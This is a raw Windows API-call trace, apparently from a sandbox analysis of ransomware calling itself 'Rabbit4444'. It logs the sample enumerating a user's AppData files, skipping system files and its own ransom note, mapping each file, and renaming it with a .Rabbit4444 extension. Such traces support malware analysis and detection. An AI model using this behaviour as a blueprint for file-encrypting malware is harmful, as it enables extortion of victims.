1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="Rabbit4444.exe") returned -1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2=".") returned 1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="..") returned 1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="windows") returned -1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="bootmgr") returned 1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="pagefile.sys") returned -1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="boot") returned 1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="ids.txt") returned 1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="NTUSER.DAT") returned -1 [0050.432] lstrcpyW (in: lpString1=0x130eb78, lpString2="J9xGx_zgbd5MhMcXW.ods" | out: lpString1="J9xGx_zgbd5MhMcXW.ods") returned="J9xGx_zgbd5MhMcXW.ods" [0050.432] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\J9xGx_zgbd5MhMcXW.ods", dwFileAttributes=0x0) returned 1 [0050.432] lstrlenW (lpString="J9xGx_zgbd5MhMcXW.ods") returned 21 [0050.432] lstrlenW (lpString="Rabbit4444") returned 10 [0050.432] lstrcmpiW (lpString1="MhMcXW.ods", lpString2="Rabbit4444") returned -1 [0050.432] lstrlenW (lpString=".dll") returned 4 [0050.432] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0050.432] lstrlenW (lpString=".lnk") returned 4 [0050.432] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0050.432] lstrlenW (lpString=".ini") returned 4 [0050.432] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0050.432] lstrlenW (lpString=".sys") returned 4 [0050.432] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0050.432] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\J9xGx_zgbd5MhMcXW.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\j9xgx_zgbd5mhmcxw.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.432] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.432] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14174319571) returned 1 [0050.432] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=66846) returned 1 [0050.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.433] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10820, lpName=0x0) returned 0x298 [0050.433] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10820) returned 0x70000 [0050.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.435] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14174553978) returned 1 [0050.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.435] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.435] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.436] CloseHandle (hObject=0x298) returned 1 [0050.436] CloseHandle (hObject=0x278) returned 1 [0050.436] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\J9xGx_zgbd5MhMcXW.ods.Rabbit4444") returned 64 [0050.436] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\J9xGx_zgbd5MhMcXW.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\j9xgx_zgbd5mhmcxw.ods"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\J9xGx_zgbd5MhMcXW.ods.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\j9xgx_zgbd5mhmcxw.ods.rabbit4444"), dwFlags=0x1) returned 1 [0050.437] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddb44310, ftCreationTime.dwHighDateTime=0x1d4cdda, ftLastAccessTime.dwLowDateTime=0x9c14bcb0, ftLastAccessTime.dwHighDateTime=0x1d4cd66, ftLastWriteTime.dwLowDateTime=0x9c14bcb0, ftLastWriteTime.dwHighDateTime=0x1d4cd66, nFileSizeHigh=0x0, nFileSizeLow=0xd3de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Knzg8bpR2isDXnxTV.m4a", cAlternateFileName="KNZG8B~1.M4A")) returned 1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="Rabbit4444.exe") returned -1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2=".") returned 1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="..") returned 1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="windows") returned -1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="bootmgr") returned 1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="pagefile.sys") returned -1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="boot") returned 1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="ids.txt") returned 1 [0050.437] lstrcmpiW (lpString1="Knzg8bpR2isDXnxTV.m4a", lpString2="NTUSER.DAT") returned -1 [0050.437] lstrcpyW (in: lpString1=0x130eb78, lpString2="Knzg8bpR2isDXnxTV.m4a" | out: lpString1="Knzg8bpR2isDXnxTV.m4a") returned="Knzg8bpR2isDXnxTV.m4a" [0050.437] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Knzg8bpR2isDXnxTV.m4a", dwFileAttributes=0x0) returned 1 [0050.438] lstrlenW (lpString="Knzg8bpR2isDXnxTV.m4a") returned 21 [0050.438] lstrlenW (lpString="Rabbit4444") returned 10 [0050.438] lstrcmpiW (lpString1="DXnxTV.m4a", lpString2="Rabbit4444") returned -1 [0050.438] lstrlenW (lpString=".dll") returned 4 [0050.438] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.438] lstrlenW (lpString=".lnk") returned 4 [0050.438] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.438] lstrlenW (lpString=".ini") returned 4 [0050.438] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.438] lstrlenW (lpString=".sys") returned 4 [0050.438] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.438] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Knzg8bpR2isDXnxTV.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\knzg8bpr2isdxnxtv.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.438] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.438] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14174876859) returned 1 [0050.438] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=54238) returned 1 [0050.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0050.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0050.438] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd6e0, lpName=0x0) returned 0x298 [0050.438] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd6e0) returned 0x70000 [0050.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.440] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14175088089) returned 1 [0050.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0050.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0050.440] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.441] CloseHandle (hObject=0x298) returned 1 [0050.441] CloseHandle (hObject=0x278) returned 1 [0050.441] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Knzg8bpR2isDXnxTV.m4a.Rabbit4444") returned 64 [0050.441] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Knzg8bpR2isDXnxTV.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\knzg8bpr2isdxnxtv.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Knzg8bpR2isDXnxTV.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\knzg8bpr2isdxnxtv.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.442] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="Rabbit4444.exe") returned -1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2=".") returned 1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="..") returned 1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="windows") returned -1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="bootmgr") returned 1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="pagefile.sys") returned -1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="boot") returned 1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="ids.txt") returned 1 [0050.442] lstrcmpiW (lpString1="Macromedia", lpString2="NTUSER.DAT") returned -1 [0050.442] lstrcpyW (in: lpString1=0x130eb78, lpString2="Macromedia" | out: lpString1="Macromedia") returned="Macromedia" [0050.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6528 [0050.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x56) returned 0x115808 [0050.442] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6530 | out: ListHead=0xf68b0, ListEntry=0xf6530) returned 0xf6670 [0050.442] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0050.442] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.442] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.442] lstrcmpiW (lpString1="Microsoft", lpString2="Rabbit4444.exe") returned -1 [0050.442] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0050.442] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0050.443] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0050.443] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0050.443] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0050.443] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0050.443] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0050.443] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0050.443] lstrcpyW (in: lpString1=0x130eb78, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0050.443] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", dwFileAttributes=0x10) returned 1 [0050.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0050.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x54) returned 0x1158c8 [0050.443] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6530 [0050.443] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="Rabbit4444.exe") returned -1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2=".") returned 1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="..") returned 1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="windows") returned -1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="bootmgr") returned 1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="pagefile.sys") returned -1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="boot") returned 1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="ids.txt") returned 1 [0050.443] lstrcmpiW (lpString1="Mozilla", lpString2="NTUSER.DAT") returned -1 [0050.443] lstrcpyW (in: lpString1=0x130eb78, lpString2="Mozilla" | out: lpString1="Mozilla") returned="Mozilla" [0050.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0050.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x50) returned 0x10d3f8 [0050.443] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf6350 [0050.443] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2822dd40, ftCreationTime.dwHighDateTime=0x1d4c5ab, ftLastAccessTime.dwLowDateTime=0xfdd8550, ftLastAccessTime.dwHighDateTime=0x1d4d0b9, ftLastWriteTime.dwLowDateTime=0xfdd8550, ftLastWriteTime.dwHighDateTime=0x1d4d0b9, nFileSizeHigh=0x0, nFileSizeLow=0x10c4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N4 X-9_q.avi", cAlternateFileName="N4X-9_~1.AVI")) returned 1 [0050.443] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.443] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.443] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="Rabbit4444.exe") returned -1 [0050.443] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2=".") returned 1 [0050.444] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="..") returned 1 [0050.444] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="windows") returned -1 [0050.444] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="bootmgr") returned 1 [0050.444] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="pagefile.sys") returned -1 [0050.444] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="boot") returned 1 [0050.444] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="ids.txt") returned 1 [0050.444] lstrcmpiW (lpString1="N4 X-9_q.avi", lpString2="NTUSER.DAT") returned -1 [0050.444] lstrcpyW (in: lpString1=0x130eb78, lpString2="N4 X-9_q.avi" | out: lpString1="N4 X-9_q.avi") returned="N4 X-9_q.avi" [0050.444] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\N4 X-9_q.avi", dwFileAttributes=0x0) returned 1 [0050.444] lstrlenW (lpString="N4 X-9_q.avi") returned 12 [0050.444] lstrlenW (lpString="Rabbit4444") returned 10 [0050.444] lstrcmpiW (lpString1=" X-9_q.avi", lpString2="Rabbit4444") returned -1 [0050.444] lstrlenW (lpString=".dll") returned 4 [0050.444] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0050.444] lstrlenW (lpString=".lnk") returned 4 [0050.444] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0050.444] lstrlenW (lpString=".ini") returned 4 [0050.444] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0050.444] lstrlenW (lpString=".sys") returned 4 [0050.444] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0050.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\N4 X-9_q.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n4 x-9_q.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.444] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.444] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14175512008) returned 1 [0050.444] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=68686) returned 1 [0050.444] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.444] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0050.445] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10f50, lpName=0x0) returned 0x298 [0050.445] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10f50) returned 0x70000 [0050.446] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.446] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.446] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.446] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.446] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.447] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14175746963) returned 1 [0050.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0050.447] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.447] CloseHandle (hObject=0x298) returned 1 [0050.448] CloseHandle (hObject=0x278) returned 1 [0050.448] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\N4 X-9_q.avi.Rabbit4444") returned 55 [0050.448] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\N4 X-9_q.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n4 x-9_q.avi"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\N4 X-9_q.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n4 x-9_q.avi.rabbit4444"), dwFlags=0x1) returned 1 [0050.449] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f462a00, ftCreationTime.dwHighDateTime=0x1d4cacf, ftLastAccessTime.dwLowDateTime=0x22f32d00, ftLastAccessTime.dwHighDateTime=0x1d4c65c, ftLastWriteTime.dwLowDateTime=0x22f32d00, ftLastWriteTime.dwHighDateTime=0x1d4c65c, nFileSizeHigh=0x0, nFileSizeLow=0x15c8b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N8MfSDtCG2.avi", cAlternateFileName="N8MFSD~1.AVI")) returned 1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="Rabbit4444.exe") returned -1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2=".") returned 1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="..") returned 1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="windows") returned -1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="bootmgr") returned 1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="pagefile.sys") returned -1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="boot") returned 1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="ids.txt") returned 1 [0050.449] lstrcmpiW (lpString1="N8MfSDtCG2.avi", lpString2="NTUSER.DAT") returned -1 [0050.449] lstrcpyW (in: lpString1=0x130eb78, lpString2="N8MfSDtCG2.avi" | out: lpString1="N8MfSDtCG2.avi") returned="N8MfSDtCG2.avi" [0050.449] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\N8MfSDtCG2.avi", dwFileAttributes=0x0) returned 1 [0050.449] lstrlenW (lpString="N8MfSDtCG2.avi") returned 14 [0050.449] lstrlenW (lpString="Rabbit4444") returned 10 [0050.449] lstrcmpiW (lpString1="SDtCG2.avi", lpString2="Rabbit4444") returned 1 [0050.449] lstrlenW (lpString=".dll") returned 4 [0050.449] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0050.449] lstrlenW (lpString=".lnk") returned 4 [0050.449] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0050.449] lstrlenW (lpString=".ini") returned 4 [0050.449] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0050.450] lstrlenW (lpString=".sys") returned 4 [0050.450] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0050.450] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\N8MfSDtCG2.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n8mfsdtcg2.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.450] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.450] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14176049387) returned 1 [0050.450] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=89227) returned 1 [0050.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0050.450] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15f90, lpName=0x0) returned 0x298 [0050.450] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15f90) returned 0x70000 [0050.452] 